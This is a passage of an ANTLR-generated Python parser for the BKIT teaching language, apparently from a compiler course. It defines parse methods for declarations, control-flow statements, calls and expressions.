self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 76\n self.var_declare()\n self.state = 77\n self.match(BKITParser.SEMI)\n self.state = 83\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 87\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 84\n self.function_declare()\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 90\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_declare\" ):\n listener.enterVar_declare(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_declare\" ):\n listener.exitVar_declare(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 92\n self.match(BKITParser.VAR)\n self.state = 93\n self.match(BKITParser.COLON)\n self.state = 94\n self.var_list()\n except RecognitionException as re:\n 
localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterFunction_declare\" ):\n listener.enterFunction_declare(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitFunction_declare\" ):\n listener.exitFunction_declare(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n 
self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.FUNCTION)\n self.state = 97\n self.match(BKITParser.COLON)\n self.state = 98\n self.match(BKITParser.ID)\n self.state = 102\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 99\n self.match(BKITParser.PARAMETER)\n self.state = 100\n self.match(BKITParser.COLON)\n self.state = 101\n self.params_list()\n\n\n self.state = 104\n self.match(BKITParser.BODY)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 111\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 106\n self.var_declare_stmt()\n self.state = 107\n self.match(BKITParser.SEMI)\n self.state = 113\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 117\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 114\n self.stmt()\n self.state = 119\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 120\n self.match(BKITParser.ENDBODY)\n self.state = 121\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser 
= parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterStmt_list\" ):\n listener.enterStmt_list(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitStmt_list\" ):\n listener.exitStmt_list(self)\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 128\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 123\n self.var_declare_stmt()\n self.state = 124\n self.match(BKITParser.SEMI)\n self.state = 130\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 134\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 131\n self.stmt() \n self.state = 136\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, 
invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterStmt\" ):\n listener.enterStmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitStmt\" ):\n listener.exitStmt(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_stmt)\n try:\n self.state = 156\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 137\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 138\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 139\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 140\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n 
self.state = 141\n self.assign_stmt()\n self.state = 142\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 144\n self.break_stmt()\n self.state = 145\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 147\n self.continue_stmt()\n self.state = 148\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 150\n self.call_stmt()\n self.state = 151\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 153\n self.return_stmt()\n self.state = 154\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def 
getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterIf_stmt\" ):\n listener.enterIf_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitIf_stmt\" ):\n listener.exitIf_stmt(self)\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 158\n self.match(BKITParser.IF)\n self.state = 159\n self.expr()\n self.state = 160\n self.match(BKITParser.THEN)\n self.state = 161\n self.stmt_list()\n self.state = 169\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 162\n self.match(BKITParser.ELSEIF)\n self.state = 163\n self.expr()\n self.state = 164\n self.match(BKITParser.THEN)\n self.state = 165\n self.stmt_list()\n self.state = 171\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 174\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 172\n self.match(BKITParser.ELSE)\n self.state = 173\n self.stmt_list()\n\n\n self.state = 176\n self.match(BKITParser.ENDIF)\n self.state = 177\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_declare_stmt\" 
):\n listener.enterVar_declare_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_declare_stmt\" ):\n listener.exitVar_declare_stmt(self)\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 179\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterFor_stmt\" ):\n listener.enterFor_stmt(self)\n\n def exitRule(self, 
listener:ParseTreeListener):\n if hasattr( listener, \"exitFor_stmt\" ):\n listener.exitFor_stmt(self)\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 181\n self.match(BKITParser.FOR)\n self.state = 182\n self.match(BKITParser.LEFT_PAREN)\n self.state = 183\n self.match(BKITParser.ID)\n self.state = 184\n self.match(BKITParser.ASSIGN)\n self.state = 185\n self.expr()\n self.state = 186\n self.match(BKITParser.COMMA)\n self.state = 187\n self.expr()\n self.state = 188\n self.match(BKITParser.COMMA)\n self.state = 189\n self.expr()\n self.state = 190\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 191\n self.match(BKITParser.DO)\n self.state = 192\n self.stmt_list()\n self.state = 193\n self.match(BKITParser.ENDFOR)\n self.state = 194\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterWhile_stmt\" ):\n listener.enterWhile_stmt(self)\n\n def exitRule(self, 
listener:ParseTreeListener):\n if hasattr( listener, \"exitWhile_stmt\" ):\n listener.exitWhile_stmt(self)\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 196\n self.match(BKITParser.WHILE)\n self.state = 197\n self.expr()\n self.state = 198\n self.match(BKITParser.DO)\n self.state = 199\n self.stmt_list()\n self.state = 200\n self.match(BKITParser.ENDWHILE)\n self.state = 201\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterDowhile_stmt\" ):\n listener.enterDowhile_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitDowhile_stmt\" ):\n listener.exitDowhile_stmt(self)\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 203\n self.match(BKITParser.DO)\n self.state = 204\n 
self.stmt_list()\n self.state = 205\n self.match(BKITParser.WHILE)\n self.state = 206\n self.expr()\n self.state = 207\n self.match(BKITParser.ENDDO)\n self.state = 208\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterAssign_stmt\" ):\n listener.enterAssign_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitAssign_stmt\" ):\n listener.exitAssign_stmt(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 212\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 210\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.state = 211\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 214\n self.match(BKITParser.ASSIGN)\n self.state = 215\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n 
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterBreak_stmt\" ):\n listener.enterBreak_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitBreak_stmt\" ):\n listener.exitBreak_stmt(self)\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterContinue_stmt\" ):\n listener.enterContinue_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitContinue_stmt\" ):\n listener.exitContinue_stmt(self)\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 219\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n 
finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterCall_stmt\" ):\n listener.enterCall_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitCall_stmt\" ):\n listener.exitCall_stmt(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 221\n self.match(BKITParser.ID)\n self.state = 222\n self.match(BKITParser.LEFT_PAREN)\n self.state = 233\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 223\n self.expr()\n self.state = 228\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 224\n 
self.match(BKITParser.COMMA)\n self.state = 225\n self.expr()\n self.state = 230\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 235\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 236\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterReturn_stmt\" ):\n listener.enterReturn_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitReturn_stmt\" ):\n listener.exitReturn_stmt(self)\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 238\n self.match(BKITParser.RETURN)\n self.state = 240\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 239\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n 
finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def REL_OP(self):\n return self.getToken(BKITParser.REL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr\" ):\n listener.enterExpr(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr\" ):\n listener.exitExpr(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_expr)\n try:\n self.state = 247\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,14,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 242\n self.expr1(0)\n self.state = 243\n self.match(BKITParser.REL_OP)\n self.state = 244\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 246\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def BIN_LOGICAL_OP(self):\n return self.getToken(BKITParser.BIN_LOGICAL_OP, 0)\n\n def getRuleIndex(self):\n return 
